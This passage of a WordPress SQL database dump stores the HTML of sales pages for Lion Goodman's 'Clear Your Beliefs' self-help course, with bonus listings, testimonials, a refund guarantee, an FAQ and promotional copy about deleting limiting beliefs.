soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1921, 2219, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72868:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank" >Register for FREE Ebook</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\n\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" 